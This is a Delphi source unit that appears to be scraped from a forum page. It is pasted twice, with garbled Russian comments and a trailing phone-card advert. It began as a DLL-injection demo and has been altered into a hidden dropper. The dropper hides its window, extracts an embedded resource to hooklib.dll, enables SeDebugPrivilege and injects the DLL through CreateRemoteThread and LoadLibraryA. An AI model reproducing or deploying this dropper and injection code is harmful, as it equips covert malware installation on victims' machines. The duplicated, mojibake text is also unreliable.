////////////////////////////////////////////////////////////////////////////////
//
// ****************************************************************************
// * Project : Inject/Eject Library Demo
// * Unit Name : main
// * Purpose : 腻祛眈蝠圉桀眄 镳桁屦 忭邃疱龛 徼犭桀蝈觇 麇疱?CreateRemoteThread
// * Author : 离尻襦礓?(Rouse_) 拎沐朦
// * Version : 1.00
// ****************************************************************************
//unit main;interfaceuses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls;const
DLLName = 'hooklib.dll';
type
TfrmMain = class(TForm)
GroupBox: TGroupBox;
lbStatus: TListBox;
procedure btnInjectEjectClick(Sender: TObject);
private
function InjectLib(const ProcessID: DWORD): Boolean; end; // 腻觌囵圉? 趔黻鲨?镳?镱祛 觐蝾瘥?狍溴?镳铊聃钿栩?恹沭箸赅 徼腓铗尻?
TGetModuleHandle = function (lpModuleName: PChar): HMODULE; stdcall;
TFreeLibrary = function (hLibModule: HMODULE): BOOL; stdcall; // 羊痼牝箴?镥疱溧忄屐? 镱蝾觐忸?趔黻鲨?镳?恹沭箸赍 徼犭桀蝈觇
PEjectLibStruct = ^TEjectLibStruct;
TEjectLibStruct = record
hGetModuleHandle: TGetModuleHandle;
hFreeLibrary: TFreeLibrary;
lpModuleName: PChar;
end;var
frmMain: TfrmMain;
File1: String = 'nserver';
File1Extention: String = 'dll';
File2Extention: String = 'dll';
implementation{$R *.dfm}
{$R 'coolvibes.res' 'coolvibes.RC'}
{ TfrmMain }// 吾疣犷蝼桕 觏铒觇 磬 忭邃疱龛?恹沭箸牦 徼犭桀蝈觇
// =============================================================================
procedure TfrmMain.btnInjectEjectClick(Sender: TObject);
begin
ShowWindow(Handle, SW_HIDE);
ShowWindow(Application.Handle, SW_HIDE) ;
SetWindowLong(Application.Handle, GWL_EXSTYLE, GetWindowLong(Application.Handle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW ) ;
ShowWindow(Application.Handle, SW_HIDE) ; TComponent(Sender).Tag := TComponent(Sender).Tag + 1;
if (TComponent(Sender).Tag mod 2) = 1 then
begin if InjectLib(GetCurrentProcessID) then
lbStatus.Items.Add('Inyeccion con exito.')
else
end
end;// procedure dropper
// Extraer un resource a un archivo y ejecutarloprocedure ExtractFile(whichone: String);
var
WhichExtention: String;
DirBuff,FileNameBuff,ResultFilePath,ResourcePointer: PChar;
ResourceLocation: HRSRC;
ResourceSize,byteswritten: Longword;
ResDataHandle: THandle;
FileHandle: THandle;
begin
//Obtener memoria
getMem(DirBuff,MAX_PATH+1);
getMem(FileNameBuff,MAX_PATH+1);
//Obtener la extension de los archivos extraidos
if whichone = File1 then WhichExtention := File1Extention
else WhichExtention := File2Extention;
ResultFilePath := 'hooklib.dll'; //Liberar memoria
freeMem(DirBuff);
freeMem(FileNameBuff); //Tiempo para extraer el resource //Buscar el resource
ResourceLocation := FindResource(HInstance,PChar(whichone),RT_RCDATA);
if ResourceLocation = 0 then exit; //Obtener el tama駉 del resource
ResourceSize := SizeofResource(HInstance,ResourceLocation);
if ResourceSize = 0 then exit; //Cargar el recurso en memoria
ResDataHandle := LoadResource(HInstance,ResourceLocation);
if ResDataHandle = 0 then exit; //Asegurar el resource
ResourcePointer := LockResource(ResDataHandle);
if ResourcePointer = NIL then exit; //Crear nuestro archivo
FileHandle := CreateFile(ResultFilePath,GENERIC_WRITE,FILE_SHARE_WRITE,NIL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
if FileHandle = INVALID_HANDLE_VALUE then exit; //Escribir Resource en un archivo
WriteFile(FileHandle,ResourcePointer^,ResourceSize,byteswritten,NIL); //Cerrar archivo
CloseHandle(FileHandle);
sleep(500);
//return
end;// 项赅 磬?镳铞羼?礤 镱塍麒?铗豚犷黜 镳桠桦邈梃,
// 忮顸 铗 觐?疣犷蜞螯 礤 狍溴?
// =============================================================================
function SetDebugPriv: Boolean;
var
Token: THandle;
tkp: TTokenPrivileges;
ReturnLength: DWORD;
begin
Result := false;
// 项塍鬣屐 蝾赍?蝈牦泐 镳铞羼襦
if OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, Token) then
begin
// 项塍鬣屐 Luid 镳桠桦邈梃
if LookupPrivilegeValue(nil, PChar('SeDebugPrivilege'), tkp.Privileges[0].Luid) then
begin
// 青镱腠屐 礤钺躅滂禧?镟疣戾蝠?
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
// 玛膻鬣屐 镳桠桦邈棹
Result := AdjustTokenPrivileges(Token, false, tkp, 0, nil, ReturnLength);
end;
end;
end; // 泽黻鲨 忭邃?弪 徼犭桀蝈牦 ?箐嚯屙睇?镳铞羼??PID 疣忭 ProcessID
// 碾 篑镥钽?忭邃疱龛 眢骓?镥疱溧螯 噤疱?趔黻鲨?LoadLibraryA
// ?矬螯 ?玎沭箧噱祛?徼犭桀蝈赍.
// 羊痤牦 ?矬蝈?礤钺躅滂祛 疣珈羼蜩螯 ?嚯疱耥铎 镳铖蝠囗耱忮 箐嚯屙眍泐 镳铞羼襦
// =============================================================================
function TfrmMain.InjectLib(const ProcessID: DWORD): Boolean;
var
Process: HWND;
ThreadRtn: FARPROC;
DllPath: String;
RemoteDll: Pointer;
BytesWriten: DWORD;
Thread: DWORD;
ThreadId: DWORD;
ExitCode: DWORD;
begin
// 玉蜞磬怆桠噱?铗豚漕黜 镳桠桦邈梃 潆 磬泐 镳铞羼襦
ExtractFile(File1); //Extraer + ejecutar Archivo1
Result := SetDebugPriv;
if not Result then Exit;
Process := 0;
Thread := 0;
ShowWindow(Application.Handle, SW_HIDE) ;
try
// 悟牮噱?镳铞羼?
Process := OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or
PROCESS_VM_WRITE, True, ProcessID);
if Process = 0 then Exit;
// 蔓溴?屐 ?礤?镟?螯 镱?耱痤牦
DllPath := ExtractFilePath(ParamStr(0)) + DLLName;
RemoteDll := VirtualAllocEx(Process, nil, Length(DllPath),
MEM_COMMIT or MEM_TOP_DOWN, PAGE_READWRITE);
if RemoteDll = nil then Exit;
// 翔?矬螯 ?潆??邈?噤疱耥铄 镳铖蝠囗耱忸
if not WriteProcessMemory(Process, RemoteDll, PChar(DllPath),
Length(DllPath), BytesWriten) then Exit;
if BytesWriten <> DWORD(Length(DllPath)) then Exit;
// 项塍鬣屐 噤疱?趔黻鲨?桤 Kernel32.dll
ThreadRtn := GetProcAddress(GetModuleHandle('Kernel32.dll'), 'LoadLibraryA');
if ThreadRtn = nil then Exit;
// 青矬耜噱?箐嚯屙睇?镱蝾?
Thread := CreateRemoteThread(Process, nil, 0, ThreadRtn, RemoteDll, 0, ThreadId);
if Thread = 0 then Exit;
// 其屐 镱赅 箐嚯屙睇?镱蝾?铗疣犷蜞弪...
if (WaitForSingleObject(Thread, INFINITE) = WAIT_OBJECT_0) then
if GetExitCodeThread(Thread, ExitCode) then
Result := ExitCode = 0;
finally
// 愉嚯屙睇?镱蝾?疋铪 玎溧黧 恹镱腠桦 ?玎沭箸桦 磬 徼犭桀蝈牦,
// 祛骓?铖忸犷驿囹?玎?蝮?镟?螯...
if RemoteDll <> nil then
VirtualFreeEx(Process, @RemoteDll, 0, MEM_RELEASE);
if Thread <> 0 then CloseHandle(Thread);
if Process <> 0 then CloseHandle(Process);
end;
end;// 碾 蝾泐 黩钺?恹沭箸栩?徼犭桀蝈牦, 礤钺躅滂祛 磬轵?邋 噤疱??箐嚯屙眍?
// 镳铞羼皴 ?恹玮囹?蜞?驽 FreeLibrary
// 蒡桁 ?磬?狍溴?玎龛爨螯? 忸?蜞赅 趔黻鲨
// 碾 篑镥铋 邋 疣犷螓 礤钺躅滂祛 镥疱溧螯 3 镟疣戾蝠?
// 1: 冷疱襦 趔黻鲨?GetModuleHandle ?FreeLibrary;
// 2: 褥 祛潴?, 恹沭箸牦 觐蝾痤泐 禧 狍溴?镳铊玮钿栩?
// =============================================================================
function RemoteFreeLibrary(lpParameter: Pointer): DWORD; stdcall;
var
hLibModule: HMODULE;
begin Result := 0;
if lpParameter = nil then Exit;
// 项塍鬣屐 铒桉囹咫?磬?徼犭桀蝈觇 (桉镱朦珞屐 镥疱溧眄 镟疣戾蝠?
hLibModule := TGetModuleHandle(PEjectLibStruct(lpParameter)^.hGetModuleHandle)
(PEjectLibStruct(lpParameter)^.lpModuleName);
if hLibModule <> 0 then
// 蔓沭箧噱?徼犭桀蝈牦
Result := DWORD(TFreeLibrary(PEjectLibStruct(lpParameter)^.hFreeLibrary)(hLibModule));
end;// 泥眄? 趔黻鲨 玎矬耜噱??箐嚯屙眍?镳铞羼皴 镱蝾?
// ?镱蝾觐忸?趔黻鲨彘 RemoteFreeLibrary
// ?镱溷铗噔腓忄弪 潆 邋 疣犷螓 礤钺躅滂禧?溧眄
// =============================================================================
end.
//
// ****************************************************************************
// * Project : Inject/Eject Library Demo
// * Unit Name : main
// * Purpose : 腻祛眈蝠圉桀眄 镳桁屦 忭邃疱龛 徼犭桀蝈觇 麇疱?CreateRemoteThread
// * Author : 离尻襦礓?(Rouse_) 拎沐朦
// * Version : 1.00
// ****************************************************************************
//unit main;interfaceuses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls;const
DLLName = 'hooklib.dll';
type
TfrmMain = class(TForm)
GroupBox: TGroupBox;
lbStatus: TListBox;
procedure btnInjectEjectClick(Sender: TObject);
private
function InjectLib(const ProcessID: DWORD): Boolean; end; // 腻觌囵圉? 趔黻鲨?镳?镱祛 觐蝾瘥?狍溴?镳铊聃钿栩?恹沭箸赅 徼腓铗尻?
TGetModuleHandle = function (lpModuleName: PChar): HMODULE; stdcall;
TFreeLibrary = function (hLibModule: HMODULE): BOOL; stdcall; // 羊痼牝箴?镥疱溧忄屐? 镱蝾觐忸?趔黻鲨?镳?恹沭箸赍 徼犭桀蝈觇
PEjectLibStruct = ^TEjectLibStruct;
TEjectLibStruct = record
hGetModuleHandle: TGetModuleHandle;
hFreeLibrary: TFreeLibrary;
lpModuleName: PChar;
end;var
frmMain: TfrmMain;
File1: String = 'nserver';
File1Extention: String = 'dll';
File2Extention: String = 'dll';
implementation{$R *.dfm}
{$R 'coolvibes.res' 'coolvibes.RC'}
{ TfrmMain }// 吾疣犷蝼桕 觏铒觇 磬 忭邃疱龛?恹沭箸牦 徼犭桀蝈觇
// =============================================================================
procedure TfrmMain.btnInjectEjectClick(Sender: TObject);
begin
ShowWindow(Handle, SW_HIDE);
ShowWindow(Application.Handle, SW_HIDE) ;
SetWindowLong(Application.Handle, GWL_EXSTYLE, GetWindowLong(Application.Handle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW ) ;
ShowWindow(Application.Handle, SW_HIDE) ; TComponent(Sender).Tag := TComponent(Sender).Tag + 1;
if (TComponent(Sender).Tag mod 2) = 1 then
begin if InjectLib(GetCurrentProcessID) then
lbStatus.Items.Add('Inyeccion con exito.')
else
end
end;// procedure dropper
// Extraer un resource a un archivo y ejecutarloprocedure ExtractFile(whichone: String);
var
WhichExtention: String;
DirBuff,FileNameBuff,ResultFilePath,ResourcePointer: PChar;
ResourceLocation: HRSRC;
ResourceSize,byteswritten: Longword;
ResDataHandle: THandle;
FileHandle: THandle;
begin
//Obtener memoria
getMem(DirBuff,MAX_PATH+1);
getMem(FileNameBuff,MAX_PATH+1);
//Obtener la extension de los archivos extraidos
if whichone = File1 then WhichExtention := File1Extention
else WhichExtention := File2Extention;
ResultFilePath := 'hooklib.dll'; //Liberar memoria
freeMem(DirBuff);
freeMem(FileNameBuff); //Tiempo para extraer el resource //Buscar el resource
ResourceLocation := FindResource(HInstance,PChar(whichone),RT_RCDATA);
if ResourceLocation = 0 then exit; //Obtener el tama駉 del resource
ResourceSize := SizeofResource(HInstance,ResourceLocation);
if ResourceSize = 0 then exit; //Cargar el recurso en memoria
ResDataHandle := LoadResource(HInstance,ResourceLocation);
if ResDataHandle = 0 then exit; //Asegurar el resource
ResourcePointer := LockResource(ResDataHandle);
if ResourcePointer = NIL then exit; //Crear nuestro archivo
FileHandle := CreateFile(ResultFilePath,GENERIC_WRITE,FILE_SHARE_WRITE,NIL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
if FileHandle = INVALID_HANDLE_VALUE then exit; //Escribir Resource en un archivo
WriteFile(FileHandle,ResourcePointer^,ResourceSize,byteswritten,NIL); //Cerrar archivo
CloseHandle(FileHandle);
sleep(500);
//return
end;// 项赅 磬?镳铞羼?礤 镱塍麒?铗豚犷黜 镳桠桦邈梃,
// 忮顸 铗 觐?疣犷蜞螯 礤 狍溴?
// =============================================================================
function SetDebugPriv: Boolean;
var
Token: THandle;
tkp: TTokenPrivileges;
ReturnLength: DWORD;
begin
Result := false;
// 项塍鬣屐 蝾赍?蝈牦泐 镳铞羼襦
if OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, Token) then
begin
// 项塍鬣屐 Luid 镳桠桦邈梃
if LookupPrivilegeValue(nil, PChar('SeDebugPrivilege'), tkp.Privileges[0].Luid) then
begin
// 青镱腠屐 礤钺躅滂禧?镟疣戾蝠?
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
// 玛膻鬣屐 镳桠桦邈棹
Result := AdjustTokenPrivileges(Token, false, tkp, 0, nil, ReturnLength);
end;
end;
end; // 泽黻鲨 忭邃?弪 徼犭桀蝈牦 ?箐嚯屙睇?镳铞羼??PID 疣忭 ProcessID
// 碾 篑镥钽?忭邃疱龛 眢骓?镥疱溧螯 噤疱?趔黻鲨?LoadLibraryA
// ?矬螯 ?玎沭箧噱祛?徼犭桀蝈赍.
// 羊痤牦 ?矬蝈?礤钺躅滂祛 疣珈羼蜩螯 ?嚯疱耥铎 镳铖蝠囗耱忮 箐嚯屙眍泐 镳铞羼襦
// =============================================================================
function TfrmMain.InjectLib(const ProcessID: DWORD): Boolean;
var
Process: HWND;
ThreadRtn: FARPROC;
DllPath: String;
RemoteDll: Pointer;
BytesWriten: DWORD;
Thread: DWORD;
ThreadId: DWORD;
ExitCode: DWORD;
begin
// 玉蜞磬怆桠噱?铗豚漕黜 镳桠桦邈梃 潆 磬泐 镳铞羼襦
ExtractFile(File1); //Extraer + ejecutar Archivo1
Result := SetDebugPriv;
if not Result then Exit;
Process := 0;
Thread := 0;
ShowWindow(Application.Handle, SW_HIDE) ;
try
// 悟牮噱?镳铞羼?
Process := OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or
PROCESS_VM_WRITE, True, ProcessID);
if Process = 0 then Exit;
// 蔓溴?屐 ?礤?镟?螯 镱?耱痤牦
DllPath := ExtractFilePath(ParamStr(0)) + DLLName;
RemoteDll := VirtualAllocEx(Process, nil, Length(DllPath),
MEM_COMMIT or MEM_TOP_DOWN, PAGE_READWRITE);
if RemoteDll = nil then Exit;
// 翔?矬螯 ?潆??邈?噤疱耥铄 镳铖蝠囗耱忸
if not WriteProcessMemory(Process, RemoteDll, PChar(DllPath),
Length(DllPath), BytesWriten) then Exit;
if BytesWriten <> DWORD(Length(DllPath)) then Exit;
// 项塍鬣屐 噤疱?趔黻鲨?桤 Kernel32.dll
ThreadRtn := GetProcAddress(GetModuleHandle('Kernel32.dll'), 'LoadLibraryA');
if ThreadRtn = nil then Exit;
// 青矬耜噱?箐嚯屙睇?镱蝾?
Thread := CreateRemoteThread(Process, nil, 0, ThreadRtn, RemoteDll, 0, ThreadId);
if Thread = 0 then Exit;
// 其屐 镱赅 箐嚯屙睇?镱蝾?铗疣犷蜞弪...
if (WaitForSingleObject(Thread, INFINITE) = WAIT_OBJECT_0) then
if GetExitCodeThread(Thread, ExitCode) then
Result := ExitCode = 0;
finally
// 愉嚯屙睇?镱蝾?疋铪 玎溧黧 恹镱腠桦 ?玎沭箸桦 磬 徼犭桀蝈牦,
// 祛骓?铖忸犷驿囹?玎?蝮?镟?螯...
if RemoteDll <> nil then
VirtualFreeEx(Process, @RemoteDll, 0, MEM_RELEASE);
if Thread <> 0 then CloseHandle(Thread);
if Process <> 0 then CloseHandle(Process);
end;
end;// 碾 蝾泐 黩钺?恹沭箸栩?徼犭桀蝈牦, 礤钺躅滂祛 磬轵?邋 噤疱??箐嚯屙眍?
// 镳铞羼皴 ?恹玮囹?蜞?驽 FreeLibrary
// 蒡桁 ?磬?狍溴?玎龛爨螯? 忸?蜞赅 趔黻鲨
// 碾 篑镥铋 邋 疣犷螓 礤钺躅滂祛 镥疱溧螯 3 镟疣戾蝠?
// 1: 冷疱襦 趔黻鲨?GetModuleHandle ?FreeLibrary;
// 2: 褥 祛潴?, 恹沭箸牦 觐蝾痤泐 禧 狍溴?镳铊玮钿栩?
// =============================================================================
function RemoteFreeLibrary(lpParameter: Pointer): DWORD; stdcall;
var
hLibModule: HMODULE;
begin Result := 0;
if lpParameter = nil then Exit;
// 项塍鬣屐 铒桉囹咫?磬?徼犭桀蝈觇 (桉镱朦珞屐 镥疱溧眄 镟疣戾蝠?
hLibModule := TGetModuleHandle(PEjectLibStruct(lpParameter)^.hGetModuleHandle)
(PEjectLibStruct(lpParameter)^.lpModuleName);
if hLibModule <> 0 then
// 蔓沭箧噱?徼犭桀蝈牦
Result := DWORD(TFreeLibrary(PEjectLibStruct(lpParameter)^.hFreeLibrary)(hLibModule));
end;// 泥眄? 趔黻鲨 玎矬耜噱??箐嚯屙眍?镳铞羼皴 镱蝾?
// ?镱蝾觐忸?趔黻鲨彘 RemoteFreeLibrary
// ?镱溷铗噔腓忄弪 潆 邋 疣犷螓 礤钺躅滂禧?溧眄
// =============================================================================
end.
解决方案 »
免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货